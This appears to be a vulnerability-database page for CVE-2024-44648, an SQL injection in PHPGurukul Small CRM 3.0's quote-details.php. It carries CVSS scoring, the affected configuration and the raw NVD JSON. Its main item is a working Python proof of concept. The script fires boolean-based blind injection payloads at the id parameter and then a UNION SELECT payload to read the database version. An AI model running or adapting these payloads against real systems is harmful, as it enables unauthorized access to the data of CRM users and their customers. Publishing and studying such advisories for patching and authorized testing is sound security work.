Security Vulnerability Report
中文
CVE-2024-44648 CVSS 6.5 MEDIUM

CVE-2024-44648

Published: 2025-11-17 17:15:46
Last Modified: 2025-11-19 13:10:31

Description

PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via id and adminremark parameters in quote-details.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:small_crm:3.0:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Small CRM 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-44648 PoC - SQL Injection in PHPGurukul Small CRM 3.0 # Target: quote-details.php via id and adminremark parameters def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2024-44648 This PoC demonstrates the vulnerability using boolean-based blind injection """ # Test basic injection on 'id' parameter print("[*] Testing SQL Injection on id parameter...") # Normal request normal_payload = f"{target_url}/quote-details.php?id=1" # Boolean-based injection test true_payload = f"{target_url}/quote-details.php?id=1' AND 1=1 --+" false_payload = f"{target_url}/quote-details.php?id=1' AND 1=2 --+" try: # Check if application is vulnerable r_normal = requests.get(normal_payload, timeout=10) r_true = requests.get(true_payload, timeout=10) r_false = requests.get(false_payload, timeout=10) if r_true.status_code == r_normal.status_code and r_false.status_code != r_normal.status_code: print("[+] Vulnerability confirmed! Application is vulnerable to SQL Injection") # Extract database version using UNION injection union_payload = f"{target_url}/quote-details.php?id=1' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12 --+" print(f"[*] Extracting database version...") r_union = requests.get(union_payload, timeout=10) if '5.' in r_union.text or '8.' in r_union.text: print("[+] Database version extracted successfully") else: print("[-] Target may not be vulnerable") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def main(): if len(sys.argv) < 2: print("Usage: python cve-2024-44648.py <target_url>") print("Example: python cve-2024-44648.py http://localhost/small-crm") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sqli(target) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44648", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:46.230", "lastModified": "2025-11-19T13:10:31.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via id and adminremark parameters in quote-details.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:small_crm:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "7E5041FC-F03B-4093-9FA3-33F2158A41C9"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44648.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/small-crm-php/", "source": "[email protected]", "tags": ["Product"]}]}}